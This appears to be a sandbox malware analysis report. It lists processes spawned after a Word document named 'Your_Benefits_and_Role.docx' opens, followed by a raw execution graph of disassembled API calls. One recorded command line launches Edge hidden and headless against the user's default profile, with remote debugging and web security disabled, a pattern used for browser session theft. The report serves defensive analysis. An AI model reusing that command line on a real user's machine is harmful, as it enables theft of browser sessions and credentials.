                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:07:12:21
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                    File size:1'620'872 bytes
                                                                                                                                                                                    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:07:12:45
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:07:12:45
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:1.2%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:18.4%
                                                                                                                                                                                      Total number of Nodes:719
                                                                                                                                                                                      Total number of Limit Nodes:105
107095 7ffeee1be099 107093->107095 107096 7ffeee1be754 107094->107096 107097 7ffeee1be0a5 107095->107097 107102 7ffeee1be0d6 107095->107102 107098 7ffeee114c20 _raise_excf 11 API calls 107096->107098 107100 7ffeee114c20 _raise_excf 11 API calls 107097->107100 107098->107113 107099 7ffeee1be2ea _raise_excf 107106 7ffeee1be374 107099->107106 107099->107115 107191 7ffeee1036f0 107099->107191 107100->107113 107103 7ffeee1be128 107102->107103 107111 7ffeee1be0df _raise_excf 107102->107111 107104 7ffeee114c20 _raise_excf 11 API calls 107103->107104 107107 7ffeee1be130 107104->107107 107105 7ffeee1be1f5 107109 7ffeee114c20 _raise_excf 11 API calls 107105->107109 107106->107115 107199 7ffeee1f4ea0 11 API calls _raise_excf 107106->107199 107108 7ffeee114c20 _raise_excf 11 API calls 107107->107108 107108->107113 107109->107087 107111->107105 107112 7ffeee1be448 107111->107112 107114 7ffeee114c20 _raise_excf 11 API calls 107112->107114 107113->107016 107116 7ffeee1be47f 107114->107116 107115->107090 107115->107113 107200 7ffeee1f38b0 107115->107200 107117 7ffeee114c20 _raise_excf 11 API calls 107116->107117 107117->107113 107120 7ffeee1c00f6 107119->107120 107121 7ffeee1c0104 107119->107121 107120->106999 107122 7ffeee1c0114 107121->107122 107124 7ffeee1c0167 _raise_excf 107121->107124 107328 7ffeee128730 11 API calls _raise_excf 107122->107328 107130 7ffeee1c0215 107124->107130 107330 7ffeee21ddb0 11 API calls _raise_excf 107124->107330 107125 7ffeee1c012c 107329 7ffeee128730 11 API calls _raise_excf 107125->107329 107127 7ffeee1c024d 107128 7ffeee21ec40 _raise_excf 11 API calls 107127->107128 107132 7ffeee1c0255 _raise_excf 107128->107132 107129 7ffeee1c0156 107129->106999 107130->107127 107331 7ffeee21ddb0 11 API calls _raise_excf 107130->107331 107296 7ffeee134410 107132->107296 107135 7ffeee1c0270 107138 7ffeee1c0281 107135->107138 107139 7ffeee1c02c0 107135->107139 107332 7ffeee1c9000 11 API calls _raise_excf 107138->107332 107302 7ffeee1f0790 107139->107302 107141 
7ffeee1c0294 107141->106999 107142->107009 107143->107009 107144->107013 107145->107025 107146->107022 107147->106999 107148->107025 107149->107027 107150->107029 107151->107030 107152->107033 107153->107034 107154->107039 107155->107040 107156->107050 107157->107048 107158->107025 107159->107043 107160->107025 107161->107075 107162->107080 107163->107078 107164->107082 107166 7ffeee1f42a5 107165->107166 107170 7ffeee1f415e 107165->107170 107168 7ffeee1f1fc0 new[] 11 API calls 107166->107168 107174 7ffeee1f4187 _raise_excf 107166->107174 107167 7ffeee1f1fc0 new[] 11 API calls 107169 7ffeee1f41ff 107167->107169 107176 7ffeee1f42cc 107168->107176 107171 7ffeee1f494e 107169->107171 107177 7ffeee1f420b new[] _raise_excf 107169->107177 107170->107170 107172 7ffeee1f1fc0 new[] 11 API calls 107170->107172 107170->107174 107173 7ffeee114c20 _raise_excf 11 API calls 107171->107173 107188 7ffeee1f43de _raise_excf 107171->107188 107172->107174 107173->107188 107174->107167 107174->107188 107175 7ffeee1f443c 107189 7ffeee1f44a0 _raise_excf 107175->107189 107212 7ffeee104510 107175->107212 107176->107174 107176->107176 107180 7ffeee1f43d6 107176->107180 107176->107188 107229 7ffeee1bfb50 11 API calls _raise_excf 107176->107229 107177->107175 107186 7ffeee114c20 _raise_excf 11 API calls 107177->107186 107183 7ffeee114c20 _raise_excf 11 API calls 107180->107183 107182 7ffeee1f4732 107182->107188 107231 7ffeee1a5910 107182->107231 107183->107188 107184 7ffeee114c20 _raise_excf 11 API calls 107184->107188 107186->107175 107187 7ffeee1f43c7 107187->107174 107187->107180 107188->107099 107189->107182 107230 7ffeee1f4ea0 11 API calls _raise_excf 107189->107230 107196 7ffeee10371d _raise_excf 107191->107196 107192 7ffeee1037a0 ReadFile 107193 7ffeee103858 107192->107193 107192->107196 107195 7ffeee103734 new[] _raise_excf 107193->107195 107247 7ffeee128730 11 API calls _raise_excf 107193->107247 107195->107106 107196->107192 107196->107193 107196->107195 107197 7ffeee103830 
107196->107197 107246 7ffeee241a30 19 API calls _raise_excf 107197->107246 107199->107115 107202 7ffeee1f38e3 _raise_excf 107200->107202 107248 7ffeee21f260 107202->107248 107204 7ffeee1f39cd _raise_excf 107205 7ffeee1f3a14 _raise_excf 107204->107205 107270 7ffeee1a1310 30 API calls _raise_excf 107204->107270 107206 7ffeee1a5910 _raise_excf 11 API calls 107205->107206 107207 7ffeee1f3af3 107206->107207 107260 7ffeee10da70 107207->107260 107221 7ffeee104561 107212->107221 107215 7ffeee1049d1 107216 7ffeee114c20 _raise_excf 11 API calls 107215->107216 107228 7ffeee1049d9 _raise_excf 107216->107228 107217 7ffeee1047c0 CreateFileW 107217->107221 107220 7ffeee104aac 107223 7ffeee114c20 _raise_excf 11 API calls 107220->107223 107221->107215 107221->107217 107221->107220 107222 7ffeee114c20 _raise_excf 11 API calls 107221->107222 107224 7ffeee104a72 107221->107224 107221->107228 107235 7ffeee2428d0 107221->107235 107241 7ffeee241210 20 API calls 2 library calls 107221->107241 107242 7ffeee107490 19 API calls _raise_excf 107221->107242 107243 7ffeee128730 11 API calls _raise_excf 107221->107243 107222->107221 107223->107228 107244 7ffeee241a30 19 API calls _raise_excf 107224->107244 107226 7ffeee104a9d 107245 7ffeee1bfb50 11 API calls _raise_excf 107226->107245 107228->107189 107229->107187 107230->107182 107232 7ffeee1a59fd 107231->107232 107233 7ffeee1a5919 107231->107233 107232->107184 107233->107232 107234 7ffeee114c20 _raise_excf 11 API calls 107233->107234 107234->107232 107236 7ffeee242915 107235->107236 107237 7ffeee1f1fc0 new[] 11 API calls 107236->107237 107238 7ffeee242971 107236->107238 107239 7ffeee24292a new[] 107237->107239 107238->107221 107239->107238 107240 7ffeee114c20 _raise_excf 11 API calls 107239->107240 107240->107238 107241->107221 107242->107221 107243->107221 107244->107226 107245->107228 107246->107195 107247->107195 107249 7ffeee21f3e1 107248->107249 107250 7ffeee21f28f 107248->107250 107249->107204 107252 7ffeee21f34f _raise_excf 
107250->107252 107285 7ffeee21ef90 30 API calls _raise_excf 107250->107285 107251 7ffeee21f3be 107254 7ffeee114c20 _raise_excf 11 API calls 107251->107254 107252->107251 107271 7ffeee104d70 107252->107271 107255 7ffeee21f3d9 107254->107255 107256 7ffeee114c20 _raise_excf 11 API calls 107255->107256 107256->107249 107257 7ffeee21f303 107257->107252 107286 7ffeee239310 11 API calls _raise_excf 107257->107286 107261 7ffeee10da86 107260->107261 107262 7ffeee10da8d 107260->107262 107295 7ffeee1a5bc0 11 API calls _raise_excf 107261->107295 107289 7ffeee1a5620 107262->107289 107266 7ffeee114c20 _raise_excf 11 API calls 107267 7ffeee10dab6 107266->107267 107268 7ffeee114c20 _raise_excf 11 API calls 107267->107268 107269 7ffeee10dabf 107268->107269 107270->107205 107272 7ffeee2428d0 11 API calls 107271->107272 107273 7ffeee104d93 107272->107273 107274 7ffeee104da5 GetFileAttributesW 107273->107274 107284 7ffeee104d9b 107273->107284 107275 7ffeee104dc3 107274->107275 107276 7ffeee104e50 107274->107276 107275->107276 107277 7ffeee104dd8 DeleteFileW 107275->107277 107283 7ffeee104e67 107275->107283 107278 7ffeee104e8d 107276->107278 107276->107283 107277->107275 107277->107278 107280 7ffeee104e85 107278->107280 107288 7ffeee128730 11 API calls _raise_excf 107278->107288 107282 7ffeee114c20 _raise_excf 11 API calls 107280->107282 107282->107284 107287 7ffeee241a30 19 API calls _raise_excf 107283->107287 107284->107251 107285->107257 107286->107252 107287->107280 107288->107280 107290 7ffeee1a56eb 107289->107290 107291 7ffeee1a5643 107289->107291 107292 7ffeee114c20 _raise_excf 11 API calls 107290->107292 107293 7ffeee10daad 107290->107293 107291->107290 107294 7ffeee1a5910 _raise_excf 11 API calls 107291->107294 107292->107293 107293->107266 107294->107291 107295->107262 107297 7ffeee1344b9 _raise_excf 107296->107297 107299 7ffeee13442f 107296->107299 107297->107135 107298 7ffeee134498 107298->107297 107300 7ffeee114c20 _raise_excf 11 API calls 107298->107300 107299->107298 
107333 7ffeee21eb70 11 API calls _raise_excf 107299->107333 107300->107297 107303 7ffeee1c0381 107302->107303 107305 7ffeee1f07a5 107302->107305 107303->106999 107305->107303 107334 7ffeee1ff170 107305->107334 107306 7ffeee1f0851 107307 7ffeee1f0863 107306->107307 107365 7ffeee201490 11 API calls 2 library calls 107306->107365 107309 7ffeee21ec40 _raise_excf 11 API calls 107307->107309 107310 7ffeee1f086b 107309->107310 107356 7ffeee1c1da0 107310->107356 107313 7ffeee1f0802 _raise_excf 107313->107306 107342 7ffeee1bc010 107313->107342 107315 7ffeee1ecf90 _raise_excf 11 API calls 107324 7ffeee1f0bc2 _raise_excf 107315->107324 107316 7ffeee1f0873 _raise_excf 107362 7ffeee1ecf90 107316->107362 107317 7ffeee1f0d0d 107318 7ffeee1ecf90 _raise_excf 11 API calls 107317->107318 107320 7ffeee1f0d19 107318->107320 107319 7ffeee1f0a86 _raise_excf 107319->107315 107326 7ffeee1f0d62 _raise_excf 107320->107326 107367 7ffeee1c8e50 11 API calls _raise_excf 107320->107367 107323 7ffeee1f0d39 107323->107326 107368 7ffeee2327e0 11 API calls _raise_excf 107323->107368 107324->107317 107366 7ffeee13e530 11 API calls _raise_excf 107324->107366 107326->107303 107327 7ffeee25996c 11 API calls 107326->107327 107327->107303 107328->107125 107329->107129 107330->107124 107331->107130 107332->107141 107333->107299 107335 7ffeee1ff19f _raise_excf 107334->107335 107336 7ffeee1ff20f 107335->107336 107369 7ffeee1be8c0 107335->107369 107337 7ffeee134410 _raise_excf 11 API calls 107336->107337 107339 7ffeee1ff221 107337->107339 107341 7ffeee1ff27f _raise_excf 107339->107341 107381 7ffeee1fe870 11 API calls _raise_excf 107339->107381 107341->107313 107343 7ffeee1bc028 _raise_excf 107342->107343 107344 7ffeee1be8c0 _raise_excf 30 API calls 107343->107344 107347 7ffeee1bc043 _raise_excf 107344->107347 107345 7ffeee1f38b0 _raise_excf 32 API calls 107346 7ffeee1bc136 107345->107346 107348 7ffeee1bc15c 107346->107348 107349 7ffeee114c20 _raise_excf 11 API calls 107346->107349 107347->107345 107352 
7ffeee1bc18b 107347->107352 107350 7ffeee1a5910 _raise_excf 11 API calls 107348->107350 107353 7ffeee1bc178 107348->107353 107349->107348 107350->107353 107351 7ffeee114c20 _raise_excf 11 API calls 107351->107352 107354 7ffeee114c20 _raise_excf 11 API calls 107352->107354 107353->107351 107355 7ffeee1bc1ba 107354->107355 107355->107313 107357 7ffeee1c1ebe 107356->107357 107358 7ffeee1c1dbf _raise_excf 107356->107358 107359 7ffeee1c1f31 _raise_excf 107357->107359 107361 7ffeee114c20 _raise_excf 11 API calls 107357->107361 107358->107357 107360 7ffeee114c20 _raise_excf 11 API calls 107358->107360 107359->107316 107360->107358 107361->107359 107363 7ffeee114c20 _raise_excf 11 API calls 107362->107363 107364 7ffeee1ecfb5 107363->107364 107364->107319 107365->107307 107366->107324 107367->107323 107368->107326 107370 7ffeee1be8e7 _raise_excf 107369->107370 107373 7ffeee1be911 107370->107373 107386 7ffeee1b2250 29 API calls _raise_excf 107370->107386 107374 7ffeee1be937 107373->107374 107387 7ffeee1bf8b0 29 API calls _raise_excf 107373->107387 107378 7ffeee1be9dd _raise_excf 107374->107378 107388 7ffeee1f4a30 30 API calls _raise_excf 107374->107388 107377 7ffeee1be9fa _raise_excf 107377->107335 107382 7ffeee132d90 107378->107382 107379 7ffeee1be953 _raise_excf 107379->107378 107389 7ffeee1a1310 30 API calls _raise_excf 107379->107389 107381->107341 107385 7ffeee132dbd _raise_excf 107382->107385 107383 7ffeee132dca 107383->107377 107385->107383 107390 7ffeee1a1310 30 API calls _raise_excf 107385->107390 107386->107373 107387->107374 107388->107379 107389->107378 107390->107383 107391 7ffeee104ef0 107392 7ffeee105022 107391->107392 107393 7ffeee104f11 107391->107393 107393->107392 107395 7ffeee242200 107393->107395 107396 7ffeee24253f _raise_excf 107395->107396 107399 7ffeee24223e 107395->107399 107396->107392 107398 7ffeee104d70 21 API calls 107398->107399 107399->107396 107399->107398 107402 7ffeee24257d 107399->107402 107405 7ffeee242700 107399->107405 107414 
7ffeee2410a0 11 API calls _raise_excf 107399->107414 107415 7ffeee128730 11 API calls _raise_excf 107399->107415 107416 7ffeee24b834 8 API calls 107402->107416 107404 7ffeee242582 107406 7ffeee242712 107405->107406 107409 7ffeee242758 107405->107409 107408 7ffeee242723 107406->107408 107406->107409 107407 7ffeee2427b7 107407->107399 107417 7ffeee241a30 19 API calls _raise_excf 107408->107417 107409->107407 107418 7ffeee241a30 19 API calls _raise_excf 107409->107418 107411 7ffeee242752 107411->107399 107413 7ffeee2427b1 107413->107399 107414->107399 107415->107399 107416->107404 107417->107411 107418->107413 107419 7ffeee205d90 107420 7ffeee205e8e 107419->107420 107421 7ffeee205db6 107419->107421 107421->107420 107422 7ffeee205df7 107421->107422 107423 7ffeee21fa20 36 API calls 107421->107423 107429 7ffeee21fa20 107422->107429 107423->107422 107426 7ffeee21fa20 36 API calls 107427 7ffeee205e5a 107426->107427 107427->107420 107428 7ffeee21fa20 36 API calls 107427->107428 107428->107420 107430 7ffeee205e21 107429->107430 107434 7ffeee21fa37 107429->107434 107430->107420 107430->107426 107431 7ffeee21f940 36 API calls 107431->107434 107433 7ffeee21fa20 36 API calls 107433->107434 107434->107430 107434->107431 107434->107433 107436 7ffeee1b2570 107434->107436 107466 7ffeee23a3f0 36 API calls 107434->107466 107445 7ffeee1b25c9 107436->107445 107456 7ffeee1b25c5 _raise_excf 107436->107456 107437 7ffeee1b2a25 107437->107445 107524 7ffeee1fc3a0 11 API calls 2 library calls 107437->107524 107439 7ffeee21fa20 36 API calls 107439->107456 107441 7ffeee1b3a36 107527 7ffeee1435a0 11 API calls _raise_excf 107441->107527 107444 7ffeee1b3a4e 107444->107445 107528 7ffeee1c8ea0 11 API calls _raise_excf 107444->107528 107445->107434 107448 7ffeee1b2b65 107526 7ffeee1c8ea0 11 API calls _raise_excf 107448->107526 107451 7ffeee1b2b4e 107525 7ffeee1c8ea0 11 API calls _raise_excf 107451->107525 107453 7ffeee1f1fc0 11 API calls new[] 107453->107456 107456->107437 107456->107439 
107456->107445 107456->107448 107456->107451 107456->107453 107458 7ffeee1c8ea0 11 API calls _raise_excf 107456->107458 107467 7ffeee1acd40 107456->107467 107506 7ffeee1f18e0 107456->107506 107519 7ffeee1f1f90 11 API calls _raise_excf 107456->107519 107520 7ffeee1c24b0 12 API calls 2 library calls 107456->107520 107521 7ffeee235f40 36 API calls _raise_excf 107456->107521 107522 7ffeee2063d0 36 API calls _raise_excf 107456->107522 107523 7ffeee1ed7c0 11 API calls _raise_excf 107456->107523 107458->107456 107459 7ffeee1cf070 11 API calls 107462 7ffeee1b2a42 _raise_excf 107459->107462 107460 7ffeee1cef80 11 API calls 107460->107462 107461 7ffeee1f1f90 11 API calls _raise_excf 107461->107462 107462->107441 107462->107444 107462->107445 107462->107459 107462->107460 107462->107461 107463 7ffeee13d830 11 API calls 107462->107463 107464 7ffeee1cdd50 11 API calls _raise_excf 107462->107464 107465 7ffeee1c8ea0 11 API calls _raise_excf 107462->107465 107463->107462 107464->107462 107465->107462 107466->107434 107468 7ffeee1acd79 107467->107468 107491 7ffeee1ace2a _raise_excf 107467->107491 107469 7ffeee1ace8a 107468->107469 107470 7ffeee1ace1f 107468->107470 107468->107491 107472 7ffeee1acea9 107469->107472 107473 7ffeee1ace90 107469->107473 107529 7ffeee1c8ea0 11 API calls _raise_excf 107470->107529 107475 7ffeee1f1fc0 new[] 11 API calls 107472->107475 107476 7ffeee1aceae _raise_excf 107472->107476 107530 7ffeee1c8ea0 11 API calls _raise_excf 107473->107530 107475->107476 107477 7ffeee1f1fc0 new[] 11 API calls 107476->107477 107478 7ffeee1acf51 107476->107478 107479 7ffeee1acf07 _raise_excf 107476->107479 107476->107491 107477->107479 107483 7ffeee1f1fc0 new[] 11 API calls 107478->107483 107490 7ffeee1acf72 _raise_excf 107478->107490 107489 7ffeee1acf7a 107479->107489 107531 7ffeee1f6170 11 API calls 2 library calls 107479->107531 107481 7ffeee1ad08b 107485 7ffeee1ad0ad 107481->107485 107481->107491 107499 7ffeee1ad0cb 107481->107499 107483->107490 107484 7ffeee1acf4c 
107484->107478 107484->107489 107533 7ffeee1c8ea0 11 API calls _raise_excf 107485->107533 107486 7ffeee114c20 _raise_excf 11 API calls 107486->107491 107488 7ffeee1ad0ed 107492 7ffeee1ad2e0 107488->107492 107493 7ffeee1ad124 107488->107493 107489->107486 107489->107491 107532 7ffeee2063d0 36 API calls _raise_excf 107490->107532 107491->107456 107495 7ffeee21fa20 36 API calls 107492->107495 107494 7ffeee21fa20 36 API calls 107493->107494 107496 7ffeee1ad13c 107494->107496 107495->107496 107496->107491 107497 7ffeee1ad30d 107496->107497 107500 7ffeee1ad1a4 107496->107500 107536 7ffeee1c24b0 12 API calls 2 library calls 107497->107536 107499->107488 107503 7ffeee1ad2bf 107499->107503 107534 7ffeee1c8ea0 11 API calls _raise_excf 107500->107534 107501 7ffeee1ad320 107501->107491 107504 7ffeee21fa20 36 API calls 107501->107504 107535 7ffeee1c8ea0 11 API calls _raise_excf 107503->107535 107504->107491 107507 7ffeee1f190c 107506->107507 107516 7ffeee1f1911 _raise_excf 107506->107516 107537 7ffeee1fd630 107507->107537 107509 7ffeee1f1a0a 107510 7ffeee1f1a66 107509->107510 107511 7ffeee1f1a50 107509->107511 107514 7ffeee1f1a0e 107509->107514 107544 7ffeee1c8ea0 11 API calls _raise_excf 107510->107544 107543 7ffeee1c8ea0 11 API calls _raise_excf 107511->107543 107514->107456 107516->107509 107516->107514 107518 7ffeee1f19f7 107516->107518 107541 7ffeee21dc00 11 API calls 2 library calls 107516->107541 107518->107509 107542 7ffeee21def0 11 API calls 2 library calls 107518->107542 107519->107456 107520->107456 107521->107456 107522->107456 107523->107456 107524->107462 107525->107445 107526->107445 107527->107444 107528->107445 107529->107491 107530->107491 107531->107484 107532->107481 107533->107491 107534->107491 107535->107491 107536->107501 107538 7ffeee1fd649 107537->107538 107540 7ffeee1fd655 107537->107540 107545 7ffeee1eda40 107538->107545 107540->107516 107541->107518 107542->107509 107543->107514 107544->107514 107546 7ffeee1eda7c 107545->107546 107549 7ffeee1eda89 
107545->107549 107551 7ffeee1ede10 107546->107551 107548 7ffeee1edadd 107548->107540 107549->107548 107550 7ffeee1ede10 _raise_excf 36 API calls 107549->107550 107550->107549 107581 7ffeee1edb10 107551->107581 107553 7ffeee1ee370 107634 7ffeee1fe910 11 API calls 2 library calls 107553->107634 107556 7ffeee1edeeb _raise_excf 107556->107549 107557 7ffeee1edec4 _raise_excf 107557->107556 107562 7ffeee1edf54 _raise_excf 107557->107562 107563 7ffeee1edf59 _raise_excf 107557->107563 107616 7ffeee132010 107557->107616 107559 7ffeee1edf39 107560 7ffeee1edf3f _raise_excf 107559->107560 107559->107563 107627 7ffeee206190 11 API calls 2 library calls 107560->107627 107562->107553 107562->107556 107633 7ffeee1f3030 11 API calls _raise_excf 107562->107633 107565 7ffeee1edfc4 _raise_excf 107563->107565 107570 7ffeee1ee00e _raise_excf 107563->107570 107564 7ffeee1ee20a 107628 7ffeee1f1f90 11 API calls _raise_excf 107564->107628 107565->107564 107573 7ffeee1ee15f _raise_excf 107565->107573 107578 7ffeee1edfe9 _raise_excf 107565->107578 107567 7ffeee1ee243 107629 7ffeee112f50 36 API calls 2 library calls 107567->107629 107571 7ffeee114c20 _raise_excf 11 API calls 107570->107571 107570->107578 107571->107578 107572 7ffeee1ee297 _raise_excf 107575 7ffeee1ee2f4 107572->107575 107630 7ffeee1b90d0 36 API calls _raise_excf 107572->107630 107574 7ffeee114c20 _raise_excf 11 API calls 107573->107574 107573->107578 107574->107578 107575->107578 107631 7ffeee1fe870 11 API calls _raise_excf 107575->107631 107576 7ffeee1ee271 107576->107572 107579 7ffeee114c20 _raise_excf 11 API calls 107576->107579 107578->107562 107632 7ffeee1bc1d0 32 API calls _raise_excf 107578->107632 107579->107572 107582 7ffeee1eddc5 107581->107582 107583 7ffeee1edb32 107581->107583 107582->107557 107584 7ffeee1edb3b 107583->107584 107587 7ffeee1edb53 107583->107587 107635 7ffeee13ca80 11 API calls _raise_excf 107584->107635 107586 7ffeee1edb46 107586->107557 107590 7ffeee1edb92 _raise_excf 107587->107590 107591 
7ffeee1edd44 _raise_excf 107587->107591 107589 7ffeee1edbe4 107593 7ffeee1fbaa0 _raise_excf 36 API calls 107589->107593 107590->107589 107636 7ffeee13ca80 11 API calls _raise_excf 107590->107636 107591->107582 107645 7ffeee13ca80 11 API calls _raise_excf 107591->107645 107594 7ffeee1edc20 107593->107594 107597 7ffeee1edc49 107594->107597 107598 7ffeee1edc53 107594->107598 107603 7ffeee1edc51 107594->107603 107595 7ffeee1edc96 107640 7ffeee128730 11 API calls _raise_excf 107595->107640 107637 7ffeee1f3030 11 API calls _raise_excf 107597->107637 107598->107603 107638 7ffeee115f90 11 API calls _raise_excf 107598->107638 107599 7ffeee1edca5 107641 7ffeee128730 11 API calls _raise_excf 107599->107641 107603->107582 107603->107595 107604 7ffeee1edcdc _raise_excf 107603->107604 107642 7ffeee21cc90 36 API calls _raise_excf 107604->107642 107605 7ffeee1edd0f 107643 7ffeee20eeb0 11 API calls _raise_excf 107605->107643 107606 7ffeee1edccd 107606->107557 107608 7ffeee1edc64 107639 7ffeee13ca80 11 API calls _raise_excf 107608->107639 107611 7ffeee1edd19 107612 7ffeee1edd2d 107611->107612 107644 7ffeee12ee90 11 API calls _raise_excf 107611->107644 107614 7ffeee1f0790 _raise_excf 32 API calls 107612->107614 107615 7ffeee1edd35 107614->107615 107615->107557 107622 7ffeee13204b _raise_excf 107616->107622 107617 7ffeee1320a6 _raise_excf 107617->107559 107618 7ffeee1322e8 107618->107617 107666 7ffeee1a0a00 11 API calls 2 library calls 107618->107666 107622->107617 107622->107618 107623 7ffeee132262 107622->107623 107646 7ffeee1996b0 107622->107646 107662 7ffeee1a1310 30 API calls _raise_excf 107622->107662 107663 7ffeee1f3700 RaiseException _raise_excf 107622->107663 107664 7ffeee19e860 12 API calls _raise_excf 107622->107664 107623->107617 107623->107618 107665 7ffeee1a1530 12 API calls _raise_excf 107623->107665 107627->107562 107628->107567 107629->107576 107630->107575 107631->107578 107632->107562 107633->107553 107634->107556 107635->107586 107636->107589 107637->107603 
107638->107608 107639->107603 107640->107599 107641->107606 107642->107605 107643->107611 107644->107612 107645->107582 107667 7ffeee1f4fe0 107646->107667 107648 7ffeee1996c1 107654 7ffeee1997f2 _raise_excf 107648->107654 107677 7ffeee18e4b0 107648->107677 107649 7ffeee1998a9 _raise_excf 107649->107654 107703 7ffeee1a1310 30 API calls _raise_excf 107649->107703 107651 7ffeee1996e8 107651->107649 107653 7ffeee1997e1 107651->107653 107651->107654 107696 7ffeee1f4980 107651->107696 107653->107649 107653->107654 107655 7ffeee199887 107653->107655 107656 7ffeee199857 _raise_excf 107653->107656 107654->107622 107655->107649 107702 7ffeee1c3ce0 11 API calls _raise_excf 107655->107702 107700 7ffeee14ab90 11 API calls _raise_excf 107656->107700 107659 7ffeee199873 107701 7ffeee1f4ea0 11 API calls _raise_excf 107659->107701 107662->107622 107663->107622 107664->107622 107665->107618 107666->107617 107668 7ffeee1f52c0 _raise_excf 107667->107668 107672 7ffeee1f5010 _raise_excf 107667->107672 107671 7ffeee1f50af _raise_excf 107668->107671 107704 7ffeee21ed30 107668->107704 107670 7ffeee1f51b4 _raise_excf 107670->107668 107670->107671 107674 7ffeee1f4980 _raise_excf 21 API calls 107670->107674 107671->107648 107672->107668 107672->107670 107672->107671 107676 7ffeee1f5181 _raise_excf 107672->107676 107710 7ffeee1bfb50 11 API calls _raise_excf 107672->107710 107674->107668 107676->107670 107676->107671 107711 7ffeee1a1ee0 12 API calls _raise_excf 107676->107711 107678 7ffeee18e4d2 107677->107678 107679 7ffeee18e505 107677->107679 107726 7ffeee128730 11 API calls _raise_excf 107678->107726 107712 7ffeee10e160 107679->107712 107681 7ffeee18e5f6 _raise_excf 107682 7ffeee18e4fe new[] 107681->107682 107728 7ffeee1a1310 30 API calls _raise_excf 107681->107728 107682->107651 107683 7ffeee18e530 _raise_excf 107683->107681 107683->107682 107685 7ffeee18e64c 107683->107685 107686 7ffeee18e6a4 107683->107686 107727 7ffeee128730 11 API calls _raise_excf 107685->107727 107688 7ffeee18e6d2 
